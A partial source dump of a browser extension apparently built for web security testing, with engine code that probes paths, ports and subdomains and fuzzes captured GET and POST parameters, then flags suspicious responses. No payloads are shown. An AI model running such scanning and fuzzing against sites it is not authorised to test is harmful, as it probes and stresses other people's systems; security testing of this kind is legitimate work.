├── .gitignore ├── FUNDING.yml ├── LICENSE ├── Nix8810.woff ├── engine ├── detection.js ├── engine.js ├── fuzzing.js ├── helper.js └── tags.js ├── images ├── cat-default-grey.png ├── cat-default.png ├── cat-laugh.png ├── cat-love.png ├── cat-omg.png └── cat-panic.png ├── manifest.json ├── panel.css ├── panel.html ├── readme.md ├── rules ├── fuzzing.js ├── leak-urls.js ├── poc.js ├── versions.js └── web.js ├── scripts ├── background.js └── main.js ├── sounds ├── miau1.mp3 └── miau2.mp3 └── trash.svg /.gitignore: -------------------------------------------------------------------------------- 1 | .vscode/* 2 | images/.DS_Store 3 | .DS_Store 4 | Ninja-Hacker-Cat.zip 5 | -------------------------------------------------------------------------------- /FUNDING.yml: -------------------------------------------------------------------------------- 1 | github: leetcore 2 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | Mozilla Public License Version 2.0 2 | ================================== 3 | 4 | 1. Definitions 5 | -------------- 6 | 7 | 1.1. "Contributor" 8 | means each individual or legal entity that creates, contributes to 9 | the creation of, or owns Covered Software. 10 | 11 | 1.2. "Contributor Version" 12 | means the combination of the Contributions of others (if any) used 13 | by a Contributor and that particular Contributor's Contribution. 14 | 15 | 1.3. "Contribution" 16 | means Covered Software of a particular Contributor. 17 | 18 | 1.4. "Covered Software" 19 | means Source Code Form to which the initial Contributor has attached 20 | the notice in Exhibit A, the Executable Form of such Source Code 21 | Form, and Modifications of such Source Code Form, in each case 22 | including portions thereof. 23 | 24 | 1.5. 
"Incompatible With Secondary Licenses" 25 | means 26 | 27 | (a) that the initial Contributor has attached the notice described 28 | in Exhibit B to the Covered Software; or 29 | 30 | (b) that the Covered Software was made available under the terms of 31 | version 1.1 or earlier of the License, but not also under the 32 | terms of a Secondary License. 33 | 34 | 1.6. "Executable Form" 35 | means any form of the work other than Source Code Form. 36 | 37 | 1.7. "Larger Work" 38 | means a work that combines Covered Software with other material, in 39 | a separate file or files, that is not Covered Software. 40 | 41 | 1.8. "License" 42 | means this document. 43 | 44 | 1.9. "Licensable" 45 | means having the right to grant, to the maximum extent possible, 46 | whether at the time of the initial grant or subsequently, any and 47 | all of the rights conveyed by this License. 48 | 49 | 1.10. "Modifications" 50 | means any of the following: 51 | 52 | (a) any file in Source Code Form that results from an addition to, 53 | deletion from, or modification of the contents of Covered 54 | Software; or 55 | 56 | (b) any new file in Source Code Form that contains any Covered 57 | Software. 58 | 59 | 1.11. "Patent Claims" of a Contributor 60 | means any patent claim(s), including without limitation, method, 61 | process, and apparatus claims, in any patent Licensable by such 62 | Contributor that would be infringed, but for the grant of the 63 | License, by the making, using, selling, offering for sale, having 64 | made, import, or transfer of either its Contributions or its 65 | Contributor Version. 66 | 67 | 1.12. "Secondary License" 68 | means either the GNU General Public License, Version 2.0, the GNU 69 | Lesser General Public License, Version 2.1, the GNU Affero General 70 | Public License, Version 3.0, or any later versions of those 71 | licenses. 72 | 73 | 1.13. "Source Code Form" 74 | means the form of the work preferred for making modifications. 75 | 76 | 1.14. 
"You" (or "Your") 77 | means an individual or a legal entity exercising rights under this 78 | License. For legal entities, "You" includes any entity that 79 | controls, is controlled by, or is under common control with You. For 80 | purposes of this definition, "control" means (a) the power, direct 81 | or indirect, to cause the direction or management of such entity, 82 | whether by contract or otherwise, or (b) ownership of more than 83 | fifty percent (50%) of the outstanding shares or beneficial 84 | ownership of such entity. 85 | 86 | 2. License Grants and Conditions 87 | -------------------------------- 88 | 89 | 2.1. Grants 90 | 91 | Each Contributor hereby grants You a world-wide, royalty-free, 92 | non-exclusive license: 93 | 94 | (a) under intellectual property rights (other than patent or trademark) 95 | Licensable by such Contributor to use, reproduce, make available, 96 | modify, display, perform, distribute, and otherwise exploit its 97 | Contributions, either on an unmodified basis, with Modifications, or 98 | as part of a Larger Work; and 99 | 100 | (b) under Patent Claims of such Contributor to make, use, sell, offer 101 | for sale, have made, import, and otherwise transfer either its 102 | Contributions or its Contributor Version. 103 | 104 | 2.2. Effective Date 105 | 106 | The licenses granted in Section 2.1 with respect to any Contribution 107 | become effective for each Contribution on the date the Contributor first 108 | distributes such Contribution. 109 | 110 | 2.3. Limitations on Grant Scope 111 | 112 | The licenses granted in this Section 2 are the only rights granted under 113 | this License. No additional rights or licenses will be implied from the 114 | distribution or licensing of Covered Software under this License. 
115 | Notwithstanding Section 2.1(b) above, no patent license is granted by a 116 | Contributor: 117 | 118 | (a) for any code that a Contributor has removed from Covered Software; 119 | or 120 | 121 | (b) for infringements caused by: (i) Your and any other third party's 122 | modifications of Covered Software, or (ii) the combination of its 123 | Contributions with other software (except as part of its Contributor 124 | Version); or 125 | 126 | (c) under Patent Claims infringed by Covered Software in the absence of 127 | its Contributions. 128 | 129 | This License does not grant any rights in the trademarks, service marks, 130 | or logos of any Contributor (except as may be necessary to comply with 131 | the notice requirements in Section 3.4). 132 | 133 | 2.4. Subsequent Licenses 134 | 135 | No Contributor makes additional grants as a result of Your choice to 136 | distribute the Covered Software under a subsequent version of this 137 | License (see Section 10.2) or under the terms of a Secondary License (if 138 | permitted under the terms of Section 3.3). 139 | 140 | 2.5. Representation 141 | 142 | Each Contributor represents that the Contributor believes its 143 | Contributions are its original creation(s) or it has sufficient rights 144 | to grant the rights to its Contributions conveyed by this License. 145 | 146 | 2.6. Fair Use 147 | 148 | This License is not intended to limit any rights You have under 149 | applicable copyright doctrines of fair use, fair dealing, or other 150 | equivalents. 151 | 152 | 2.7. Conditions 153 | 154 | Sections 3.1, 3.2, 3.3, and 3.4 are conditions of the licenses granted 155 | in Section 2.1. 156 | 157 | 3. Responsibilities 158 | ------------------- 159 | 160 | 3.1. Distribution of Source Form 161 | 162 | All distribution of Covered Software in Source Code Form, including any 163 | Modifications that You create or to which You contribute, must be under 164 | the terms of this License. 
You must inform recipients that the Source 165 | Code Form of the Covered Software is governed by the terms of this 166 | License, and how they can obtain a copy of this License. You may not 167 | attempt to alter or restrict the recipients' rights in the Source Code 168 | Form. 169 | 170 | 3.2. Distribution of Executable Form 171 | 172 | If You distribute Covered Software in Executable Form then: 173 | 174 | (a) such Covered Software must also be made available in Source Code 175 | Form, as described in Section 3.1, and You must inform recipients of 176 | the Executable Form how they can obtain a copy of such Source Code 177 | Form by reasonable means in a timely manner, at a charge no more 178 | than the cost of distribution to the recipient; and 179 | 180 | (b) You may distribute such Executable Form under the terms of this 181 | License, or sublicense it under different terms, provided that the 182 | license for the Executable Form does not attempt to limit or alter 183 | the recipients' rights in the Source Code Form under this License. 184 | 185 | 3.3. Distribution of a Larger Work 186 | 187 | You may create and distribute a Larger Work under terms of Your choice, 188 | provided that You also comply with the requirements of this License for 189 | the Covered Software. If the Larger Work is a combination of Covered 190 | Software with a work governed by one or more Secondary Licenses, and the 191 | Covered Software is not Incompatible With Secondary Licenses, this 192 | License permits You to additionally distribute such Covered Software 193 | under the terms of such Secondary License(s), so that the recipient of 194 | the Larger Work may, at their option, further distribute the Covered 195 | Software under the terms of either this License or such Secondary 196 | License(s). 197 | 198 | 3.4. 
Notices 199 | 200 | You may not remove or alter the substance of any license notices 201 | (including copyright notices, patent notices, disclaimers of warranty, 202 | or limitations of liability) contained within the Source Code Form of 203 | the Covered Software, except that You may alter any license notices to 204 | the extent required to remedy known factual inaccuracies. 205 | 206 | 3.5. Application of Additional Terms 207 | 208 | You may choose to offer, and to charge a fee for, warranty, support, 209 | indemnity or liability obligations to one or more recipients of Covered 210 | Software. However, You may do so only on Your own behalf, and not on 211 | behalf of any Contributor. You must make it absolutely clear that any 212 | such warranty, support, indemnity, or liability obligation is offered by 213 | You alone, and You hereby agree to indemnify every Contributor for any 214 | liability incurred by such Contributor as a result of warranty, support, 215 | indemnity or liability terms You offer. You may include additional 216 | disclaimers of warranty and limitations of liability specific to any 217 | jurisdiction. 218 | 219 | 4. Inability to Comply Due to Statute or Regulation 220 | --------------------------------------------------- 221 | 222 | If it is impossible for You to comply with any of the terms of this 223 | License with respect to some or all of the Covered Software due to 224 | statute, judicial order, or regulation then You must: (a) comply with 225 | the terms of this License to the maximum extent possible; and (b) 226 | describe the limitations and the code they affect. Such description must 227 | be placed in a text file included with all distributions of the Covered 228 | Software under this License. Except to the extent prohibited by statute 229 | or regulation, such description must be sufficiently detailed for a 230 | recipient of ordinary skill to be able to understand it. 231 | 232 | 5. 
Termination 233 | -------------- 234 | 235 | 5.1. The rights granted under this License will terminate automatically 236 | if You fail to comply with any of its terms. However, if You become 237 | compliant, then the rights granted under this License from a particular 238 | Contributor are reinstated (a) provisionally, unless and until such 239 | Contributor explicitly and finally terminates Your grants, and (b) on an 240 | ongoing basis, if such Contributor fails to notify You of the 241 | non-compliance by some reasonable means prior to 60 days after You have 242 | come back into compliance. Moreover, Your grants from a particular 243 | Contributor are reinstated on an ongoing basis if such Contributor 244 | notifies You of the non-compliance by some reasonable means, this is the 245 | first time You have received notice of non-compliance with this License 246 | from such Contributor, and You become compliant prior to 30 days after 247 | Your receipt of the notice. 248 | 249 | 5.2. If You initiate litigation against any entity by asserting a patent 250 | infringement claim (excluding declaratory judgment actions, 251 | counter-claims, and cross-claims) alleging that a Contributor Version 252 | directly or indirectly infringes any patent, then the rights granted to 253 | You by any and all Contributors for the Covered Software under Section 254 | 2.1 of this License shall terminate. 255 | 256 | 5.3. In the event of termination under Sections 5.1 or 5.2 above, all 257 | end user license agreements (excluding distributors and resellers) which 258 | have been validly granted by You or Your distributors under this License 259 | prior to termination shall survive termination. 260 | 261 | ************************************************************************ 262 | * * 263 | * 6. 
Disclaimer of Warranty * 264 | * ------------------------- * 265 | * * 266 | * Covered Software is provided under this License on an "as is" * 267 | * basis, without warranty of any kind, either expressed, implied, or * 268 | * statutory, including, without limitation, warranties that the * 269 | * Covered Software is free of defects, merchantable, fit for a * 270 | * particular purpose or non-infringing. The entire risk as to the * 271 | * quality and performance of the Covered Software is with You. * 272 | * Should any Covered Software prove defective in any respect, You * 273 | * (not any Contributor) assume the cost of any necessary servicing, * 274 | * repair, or correction. This disclaimer of warranty constitutes an * 275 | * essential part of this License. No use of any Covered Software is * 276 | * authorized under this License except under this disclaimer. * 277 | * * 278 | ************************************************************************ 279 | 280 | ************************************************************************ 281 | * * 282 | * 7. Limitation of Liability * 283 | * -------------------------- * 284 | * * 285 | * Under no circumstances and under no legal theory, whether tort * 286 | * (including negligence), contract, or otherwise, shall any * 287 | * Contributor, or anyone who distributes Covered Software as * 288 | * permitted above, be liable to You for any direct, indirect, * 289 | * special, incidental, or consequential damages of any character * 290 | * including, without limitation, damages for lost profits, loss of * 291 | * goodwill, work stoppage, computer failure or malfunction, or any * 292 | * and all other commercial damages or losses, even if such party * 293 | * shall have been informed of the possibility of such damages. 
This * 294 | * limitation of liability shall not apply to liability for death or * 295 | * personal injury resulting from such party's negligence to the * 296 | * extent applicable law prohibits such limitation. Some * 297 | * jurisdictions do not allow the exclusion or limitation of * 298 | * incidental or consequential damages, so this exclusion and * 299 | * limitation may not apply to You. * 300 | * * 301 | ************************************************************************ 302 | 303 | 8. Litigation 304 | ------------- 305 | 306 | Any litigation relating to this License may be brought only in the 307 | courts of a jurisdiction where the defendant maintains its principal 308 | place of business and such litigation shall be governed by laws of that 309 | jurisdiction, without reference to its conflict-of-law provisions. 310 | Nothing in this Section shall prevent a party's ability to bring 311 | cross-claims or counter-claims. 312 | 313 | 9. Miscellaneous 314 | ---------------- 315 | 316 | This License represents the complete agreement concerning the subject 317 | matter hereof. If any provision of this License is held to be 318 | unenforceable, such provision shall be reformed only to the extent 319 | necessary to make it enforceable. Any law or regulation which provides 320 | that the language of a contract shall be construed against the drafter 321 | shall not be used to construe this License against a Contributor. 322 | 323 | 10. Versions of the License 324 | --------------------------- 325 | 326 | 10.1. New Versions 327 | 328 | Mozilla Foundation is the license steward. Except as provided in Section 329 | 10.3, no one other than the license steward has the right to modify or 330 | publish new versions of this License. Each version will be given a 331 | distinguishing version number. 332 | 333 | 10.2. 
Effect of New Versions 334 | 335 | You may distribute the Covered Software under the terms of the version 336 | of the License under which You originally received the Covered Software, 337 | or under the terms of any subsequent version published by the license 338 | steward. 339 | 340 | 10.3. Modified Versions 341 | 342 | If you create software not governed by this License, and you want to 343 | create a new license for such software, you may create and use a 344 | modified version of this License if you rename the license and remove 345 | any references to the name of the license steward (except to note that 346 | such modified license differs from this License). 347 | 348 | 10.4. Distributing Source Code Form that is Incompatible With Secondary 349 | Licenses 350 | 351 | If You choose to distribute Source Code Form that is Incompatible With 352 | Secondary Licenses under the terms of this version of the License, the 353 | notice described in Exhibit B of this License must be attached. 354 | 355 | Exhibit A - Source Code Form License Notice 356 | ------------------------------------------- 357 | 358 | This Source Code Form is subject to the terms of the Mozilla Public 359 | License, v. 2.0. If a copy of the MPL was not distributed with this 360 | file, You can obtain one at https://mozilla.org/MPL/2.0/. 361 | 362 | If it is not possible or desirable to put the notice in a particular 363 | file, then You may include the notice in a location (such as a LICENSE 364 | file in a relevant directory) where a recipient would be likely to look 365 | for such a notice. 366 | 367 | You may add additional accurate notices of copyright ownership. 368 | 369 | Exhibit B - "Incompatible With Secondary Licenses" Notice 370 | --------------------------------------------------------- 371 | 372 | This Source Code Form is "Incompatible With Secondary Licenses", as 373 | defined by the Mozilla Public License, v. 2.0. 
374 | 375 | Copyright 1337core, 2022 -------------------------------------------------------------------------------- /Nix8810.woff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Leetcore/ninja-hacker-cat/47a75544e822a6c1db9e91f5c24f98bcc8a2b3d3/Nix8810.woff -------------------------------------------------------------------------------- /engine/detection.js: -------------------------------------------------------------------------------- 1 | class Message { 2 | constructor(url, title, detectedBy, size, avatar, critLevel) { 3 | this.url = url 4 | this.title = title 5 | this.detectedBy = detectedBy 6 | this.size = size 7 | this.avatar = avatar 8 | this.critLevel = critLevel || 0 9 | this.render() 10 | } 11 | 12 | render() { 13 | const messageBox = document.querySelector("#messageBox"); 14 | // check if message is there already 15 | for (let message of document.querySelectorAll(".message")) { 16 | if (message.querySelector(".title")?.textContent == this.title 17 | && message.querySelector(".url")?.textContent == this.url 18 | && message.querySelector(".size_number")?.textContent == this.size 19 | && message.querySelector(".detectedBy")?.textContent == this.detectedBy) { 20 | return; 21 | } 22 | } 23 | 24 | // higher critlevel should be on top 25 | let position = "beforeend" 26 | if (this.critLevel > 1) { 27 | position = "afterbegin" 28 | } 29 | messageBox.insertAdjacentHTML(position, ` 30 |
31 |
32 | 33 | Size:
34 | 35 | Detected by: 36 | 37 |
`) 38 | document.querySelector('#this_title').textContent = this.title 39 | document.querySelector('#this_title').removeAttribute('id') 40 | document.querySelector('#this_url').textContent = this.url 41 | document.querySelector('#this_url').href = this.url 42 | document.querySelector('#this_url').removeAttribute('id') 43 | document.querySelector('#this_size').textContent = this.size 44 | document.querySelector('#this_size').removeAttribute('id') 45 | document.querySelector('#this_detectedBy').textContent = this.detectedBy 46 | document.querySelector('#this_detectedBy').removeAttribute('id') 47 | 48 | if (this.critLevel > 0) { 49 | document.querySelector('#sound').src = "sounds/miau1.mp3" 50 | document.querySelector('#sound').play() 51 | } 52 | 53 | 54 | // change the cat -> only show the highest critLevel 55 | if (this.avatar && this.critLevel >= window.nhc_currentCritLevel) { 56 | window.nhc_currentCritLevel = this.critLevel 57 | document.querySelectorAll('.avatar').forEach(avatar => { 58 | avatar.style.display = 'none'; 59 | }) 60 | if (document.querySelector(`#${this.avatar}`)) { 61 | document.querySelector(`#${this.avatar}`).style.display = 'block' 62 | } 63 | } 64 | 65 | if (this.critLevel > 0) { 66 | browser.notifications.create( 67 | { 68 | type: 'basic', 69 | title: 'Miau!', 70 | message: `${this.title} (${this.detectedBy})`, 71 | } 72 | ) 73 | } 74 | 75 | document.querySelector('#reset').classList.remove('hidden') 76 | } 77 | } 78 | 79 | export function detection(request_url, rule, response, body = "", detectedBy = "") { 80 | let status_code = response.status 81 | let status_filtered = (rule.filterStatusCodes || []) 82 | .find(statusCode => statusCode === status_code.toString()) 83 | let status_matched = (rule.detectStatusCodes || []) 84 | .find(statusCode => statusCode === status_code.toString()) 85 | 86 | // detection: match status code or skip if no one is set 87 | if (status_filtered || !rule.filterStatusCodes) { 88 | // detect substring in response 
body 89 | for (let detect of (rule.detectResponses || [])) { 90 | // simple response detection with strings 91 | if (body.toLowerCase().indexOf(detect.toLowerCase()) >= 0) { 92 | new Message( 93 | request_url, 94 | rule.title, 95 | detectedBy, 96 | body.length, 97 | rule.cat, 98 | rule.critLevel 99 | ) 100 | break 101 | } 102 | } 103 | 104 | // detect version with regex 105 | if (rule.regexVersion) { 106 | let regex = new RegExp(rule.regexVersion) 107 | let detectMatch = null 108 | if (rule.matchRegexHeaderName) { 109 | let header = response.headers.get(rule.matchRegexHeaderName) 110 | detectMatch = header.match(regex) 111 | } else { 112 | detectMatch = body.match(regex) 113 | } 114 | 115 | if (detectMatch && detectMatch.length > 0) { 116 | let version = detectMatch[1] 117 | if (checkIfVersionNumbersMatches(version, rule.minVersion, rule.maxVersion)) { 118 | new Message( 119 | request_url, 120 | rule.title, 121 | detectedBy, 122 | body.length, 123 | rule.cat, 124 | rule.critLevel 125 | ) 126 | } 127 | } 128 | } 129 | 130 | // detect if a specific response header is there 131 | for (let detect of (rule.detectHeaders || [])) { 132 | if (response.headers.get(detect)) { 133 | new Message( 134 | request_url, 135 | rule.title, 136 | detectedBy, 137 | body.length, 138 | rule.cat, 139 | rule.critLevel 140 | ) 141 | break 142 | } 143 | } 144 | } 145 | 146 | if (status_matched && !status_filtered) { 147 | // check if redirect is a must have 148 | if (rule.isRedirected && !response.redirected) { 149 | return; 150 | } 151 | 152 | if (rule.skipRedirected && response.redirected) { 153 | return; 154 | } 155 | 156 | // detection based only on response status code 157 | for (let status of rule.detectStatusCodes) { 158 | if (status_matched == status) { 159 | new Message( 160 | request_url, 161 | rule.title, 162 | detectedBy, 163 | body.length, 164 | rule.cat, 165 | rule.critLevel 166 | ) 167 | break 168 | } 169 | } 170 | } 171 | } 172 | 173 | function 
checkIfVersionNumbersMatches(version, minVersion, maxVersion) { 174 | let normalizedVersionString = version.split(".") 175 | .map(num => num.padStart(8, "0")) 176 | .join(".") 177 | let normalizedMinVersionString = minVersion.split(".") 178 | .map(num => num.padStart(8, "0")) 179 | .join(".") 180 | let normalizedMaxVersionString = maxVersion.split(".") 181 | .map(num => num.padStart(8, "0")) 182 | .join(".") 183 | 184 | return normalizedMinVersionString <= normalizedVersionString 185 | && normalizedMaxVersionString >= normalizedVersionString; 186 | } -------------------------------------------------------------------------------- /engine/engine.js: -------------------------------------------------------------------------------- 1 | import { detection } from "./detection.js" 2 | import { request } from "./helper.js" 3 | 4 | // this engine will make requests based on the current url 5 | export async function engine(rules, detectedTags, url) { 6 | let parsedUrl = new URL(url) 7 | let rootUrl = parsedUrl.protocol + "//" + parsedUrl.hostname 8 | if (parsedUrl.port.length > 0) { 9 | rootUrl = parsedUrl.protocol + "//" + parsedUrl.hostname + ":" + parsedUrl.port 10 | } 11 | 12 | for (let rule of rules) { 13 | // filter checks with tags 14 | // check if rule has a the same tag as in detectedTags 15 | if (!checkIfRuleTagMatches(rule.tags, detectedTags)) { 16 | continue 17 | } 18 | 19 | // only execute rule if tags match 20 | if (rule.paths) { 21 | console.log("Start detection based on GET paths") 22 | // filter rules by detect tags 23 | for (let path of rule.paths) { 24 | // filter url and remove last "/" 25 | if (url[url.length - 1] == "/") { 26 | url = url.substring(0, url.length - 1) 27 | } 28 | 29 | let requestUrl = url + path 30 | 31 | // run request 32 | let result = await request( 33 | requestUrl, 34 | null, 35 | rule.method, 36 | rule.postBody, 37 | rule.postJSON 38 | ) 39 | 40 | // detection based on server answer 41 | if (result) { 42 | detection(requestUrl, rule, 
result.response, result.body, path) 43 | } 44 | } 45 | } else if (rule.rootPaths) { 46 | console.log("Start detection based on root url") 47 | for (let rootPath of rule.rootPaths) { 48 | let requestUrl = rootUrl + rootPath 49 | console.log(requestUrl) 50 | 51 | // run request 52 | let result = await request( 53 | requestUrl, 54 | rule.headers, 55 | rule.method, 56 | rule.postBody, 57 | rule.postJSON 58 | ) 59 | 60 | // detection based on server answer 61 | if (result) { 62 | detection(requestUrl, rule, result.response, result.body, rootPath) 63 | } 64 | } 65 | } else if (rule.params) { 66 | console.log("Start detection of GET parameters") 67 | let split_url = url.split("?") 68 | if (split_url.length == 0) { 69 | console.warn("Url has no ? sign.") 70 | continue 71 | } 72 | 73 | for (let rule_param of rule.params) { 74 | let urlParams = new URLSearchParams(split_url[1]) 75 | let paramCount = Array.from(urlParams).length 76 | 77 | // iterate the params and change the param at the index 78 | for (let index = 0; index < paramCount; index++) { 79 | let key = Array.from(urlParams)[index][0] 80 | urlParams = new URLSearchParams(split_url[1]) 81 | 82 | if (rule.replaceParamValue) { 83 | urlParams.set(key, rule_param) 84 | } else { 85 | let current_param = urlParams.get(key) 86 | urlParams.set(key, current_param + rule_param) 87 | } 88 | 89 | let requestUrl = split_url[0] + "?" 
+ urlParams.toString() 90 | 91 | // run request 92 | let result = await request( 93 | requestUrl, 94 | rule.headers, 95 | rule.method, 96 | rule.postBody, 97 | rule.postJSON 98 | ) 99 | if (result) { 100 | detection(requestUrl, rule, result.response, result.body, rule_param) 101 | } 102 | } 103 | } 104 | } else if (rule.ports) { 105 | console.log("Start detection of ports") 106 | let url_parsed = new URL(url) 107 | for (let port of rule.ports) { 108 | let protocol = "https://" 109 | if (port.includes("80")) { 110 | protocol = "http://" 111 | } 112 | try { 113 | let requestUrl = protocol + url_parsed.hostname + ":" + port 114 | 115 | // run request 116 | let result = await request( 117 | requestUrl, 118 | null, 119 | "HEAD", 120 | null, 121 | null, 122 | ["nowait"] 123 | ) 124 | 125 | if (result) { 126 | detection(requestUrl, rule, result.response, "", port) 127 | } 128 | } catch (e) { 129 | console.warn(e) 130 | } 131 | } 132 | } else if (rule.subdomains) { 133 | console.log("Start detection of subdomains") 134 | let url_parsed = new URL(url) 135 | for (let subdomain of rule.subdomains) { 136 | try { 137 | let requestUrl = "http:" + "//" + subdomain + "." 
+ url_parsed.hostname 138 | 139 | // run request 140 | let result = await request( 141 | requestUrl, 142 | null, 143 | "HEAD", 144 | null, 145 | null, 146 | ["nowait"] 147 | ) 148 | 149 | if (result) { 150 | detection(requestUrl, rule, result.response, "", subdomain) 151 | } 152 | } catch (e) { 153 | console.warn(e) 154 | } 155 | } 156 | } else { 157 | // rules based on tags 158 | let requestUrl = url 159 | 160 | // run request 161 | let result = await request( 162 | requestUrl, 163 | rule.headers, 164 | rule.method, 165 | rule.postBody, 166 | rule.postJSON 167 | ) 168 | if (result) { 169 | detection(requestUrl, rule, result.response, result.body, rule.detectedBy) 170 | } 171 | } 172 | } 173 | } 174 | 175 | function checkIfRuleTagMatches(tags, detectedTags) { 176 | return tags.find(tag => { 177 | for (let detectedTag of detectedTags) { 178 | if (tag == detectedTag) { 179 | return true; 180 | } 181 | } 182 | // rule with all tag 183 | if (tag == "all") { 184 | return true; 185 | } 186 | return false; 187 | }); 188 | } -------------------------------------------------------------------------------- /engine/fuzzing.js: -------------------------------------------------------------------------------- 1 | import { detection } from "./detection.js" 2 | import { countRequests } from "./helper.js" 3 | 4 | // this fuzzing engine is based on captured webrequests 5 | export async function fuzzing_engine(rules, requestDetails) { 6 | console.log("Start detection POST fuzzing") 7 | for (let rule of rules) { 8 | // there is a filter param set 9 | // skip rules for this params 10 | if (rule.filterPostParams) { 11 | let filterThisParam = true 12 | for (let filterPostParam of (rule.filterPostParams || [])) { 13 | if (requestDetails.requestBody 14 | && requestDetails.requestBody.formData 15 | && requestDetails.requestBody.formData[filterPostParam]) { 16 | filterThisParam = false 17 | break 18 | } 19 | } 20 | if (filterThisParam) { 21 | continue 22 | } 23 | } 24 | 25 | for (let param 
of rule.postParams) { 26 | let formData = requestDetails?.requestBody?.formData 27 | let paramCount = Object.keys(formData).length 28 | 29 | // there is no form data to change 30 | if (!paramCount) { 31 | continue 32 | } 33 | 34 | // iterate the params and change the param at the index 35 | for (let index = 0; index < paramCount; index++) { 36 | let usedParam = "" 37 | let copyFormData = {} 38 | Object.assign(copyFormData, formData) 39 | 40 | // count parameter we captured in the request 41 | if (rule.replaceParamValue) { 42 | copyFormData[Object.keys(formData)[index]] = param 43 | usedParam = Object.keys(formData)[index] + "=" + param 44 | } else { 45 | copyFormData[Object.keys(formData)[index]] = Object.values(copyFormData)[index] + param 46 | usedParam = Object.keys(formData)[index] + "=" + Object.values(copyFormData)[index] 47 | } 48 | 49 | // run request 50 | let sendData = new URLSearchParams() 51 | for (let key in copyFormData) { 52 | sendData.append(key, copyFormData[key]) 53 | } 54 | 55 | // TODO: use request instead 56 | let response = await fetch(requestDetails.url, { 57 | method: 'POST', 58 | headers: { 59 | "Content-Type": "application/x-www-form-urlencoded", 60 | "X-Requested-With": "Ninja Hacker Cat" 61 | }, 62 | body: sendData.toString() 63 | }) 64 | let body = await response.text() 65 | countRequests() 66 | 67 | detection( 68 | requestDetails.url, 69 | rule, 70 | response, 71 | body, 72 | usedParam 73 | ) 74 | } 75 | } 76 | } 77 | 78 | for (let rule of rules) { 79 | // there is a filter param set 80 | // skip rules for this params 81 | if (rule.filterPostParams) { 82 | let filterThisParam = true 83 | for (let filterPostParam of (rule.filterPostParams || [])) { 84 | if (requestDetails.requestBody 85 | && requestDetails.requestBodyJSON 86 | && requestDetails.requestBodyJSON[filterPostParam]) { 87 | filterThisParam = false 88 | break 89 | } 90 | } 91 | if (filterThisParam) { 92 | continue 93 | } 94 | } 95 | 96 | for (let param of rule.postParams) { 97 
| let postJSON = requestDetails.requestBodyJSON 98 | if (!postJSON) { 99 | continue; 100 | } 101 | let paramCount = Object.keys(postJSON).length 102 | 103 | // count parameter we captured in the request 104 | for (let index = 0; index < paramCount; index++) { 105 | let usedParam = "" 106 | let copyJSON = {} 107 | Object.assign(copyJSON, postJSON) 108 | 109 | // replace / add our rule to the property at a given index 110 | if (rule.replaceParamValue) { 111 | copyJSON[Object.keys(copyJSON)[index]] = param 112 | usedParam = Object.keys(copyJSON)[index] + "=" + param 113 | } else { 114 | copyJSON[Object.keys(copyJSON)[index]] = Object.values(copyJSON)[index] + param 115 | usedParam = Object.keys(copyJSON)[index] + "=" + Object.values(copyJSON)[index] 116 | } 117 | 118 | // TODO: use request instead 119 | let response = await fetch(requestDetails.url, { 120 | method: 'POST', 121 | headers: { 122 | "Content-Type": "application/json", 123 | "X-Requested-With": "Ninja Hacker Cat" 124 | }, 125 | body: JSON.stringify(copyJSON) 126 | }) 127 | let body = await response.text() /* NOTE(review): the form-data loop earlier in this function calls countRequests() after its fetch; this JSON loop does not, so these requests are missing from the counter. */ 128 | 129 | detection( 130 | requestDetails.url, 131 | rule, 132 | response, 133 | body, 134 | usedParam 135 | ) 136 | } 137 | } 138 | } 139 | } -------------------------------------------------------------------------------- /engine/helper.js: -------------------------------------------------------------------------------- 1 | /* Returns a promise that resolves after ms milliseconds; request() uses it to space out automated requests. */ function delay(ms) { 2 | return new Promise(resolve => setTimeout(resolve, ms)); 3 | } 4 | 5 | /* Increments the global window.nhc_requestCounter and writes "<n> Requests" into the #stats element; expects both the counter and the element to exist already. */ export function countRequests() { 6 | window.nhc_requestCounter += 1 7 | document.querySelector("#stats").textContent = window.nhc_requestCounter + " Requests" 8 | } 9 | 10 | /* Wrapper around fetch() that marks, de-duplicates, throttles and counts automated requests. Returns false when the same URL and options were requested before, otherwise an object { response, body } where body is the response text. Passing "nowait" in requestOptions skips the throttle delay. */ export async function request(request_url, headers = null, method = "GET", data = null, json = null, requestOptions = []) { 11 | let options = {} 12 | options.method = method 13 | 14 | // add headers if needed 15 | options.headers = {} 16 | if (headers) { 17 | options.headers = headers /* NOTE(review): this aliases the caller's object, so the header entries assigned below are written into the caller's headers as well. */ 18 | } 19 | 20 | // mark all
automatic requests with "ninja hacker cat" 21 | options.headers["X-Requested-With"] = "Ninja Hacker Cat" /* This fixed marker lets server logs and filters attribute the tool's traffic. */ 22 | options.headers["Cache"] = "no-cache" /* NOTE(review): "Cache" is not a standard HTTP request header; Cache-Control is the standard name - confirm intent. */ 23 | 24 | // send body data 25 | if (data) { 26 | options.data = data /* NOTE(review): fetch() takes the request payload from options.body; nothing in this function sets body, so data and json appear never to be sent - confirm. */ 27 | } 28 | if (json) { 29 | options.headers["Content-Type"] = "application/json" 30 | options.data = JSON.stringify(json) 31 | } 32 | 33 | // dont request the same res twice 34 | /* The de-duplication key is the URL plus the serialised options; keys are kept in the global window.nhc_requestedUrls array, which this function only appends to. */ let id = request_url + JSON.stringify(options) 35 | if (window.nhc_requestedUrls.includes(id)) { 36 | return false; 37 | } else { 38 | window.nhc_requestedUrls.push(id) 39 | } 40 | 41 | // run request 42 | if (!requestOptions.includes("nowait")) { 43 | // this sets a global timegap for parallel requests 44 | /* Each waiting call adds 400 ms to the shared timer, sleeps for the current timer value, then subtracts the 400 ms again. */ window.nhc_requestGapTimer += 400 45 | await delay(window.nhc_requestGapTimer) 46 | window.nhc_requestGapTimer -= 400 47 | } 48 | 49 | 50 | 51 | let response = await fetch(request_url, options) 52 | let body = await response.text() 53 | countRequests() 54 | 55 | return { 56 | response: response, 57 | body: body 58 | } 59 | } 60 | 61 | -------------------------------------------------------------------------------- /engine/tags.js: -------------------------------------------------------------------------------- 1 | export async function tags(requestUrl) { 2 | let parsedUrl = new URL(requestUrl) 3 | let rootUrl = parsedUrl.protocol + "//" + parsedUrl.hostname 4 | if (parsedUrl.port.length > 0) { 5 | rootUrl = parsedUrl.protocol + "//" + parsedUrl.hostname + ":" + parsedUrl.port 6 | } 7 | 8 | let allDetectedTags = [] 9 | let response = await fetch(requestUrl) /* NOTE(review): direct fetch() - unlike request() in helper.js, this call is not counted, not de-duplicated and carries no X-Requested-With marker. */ 10 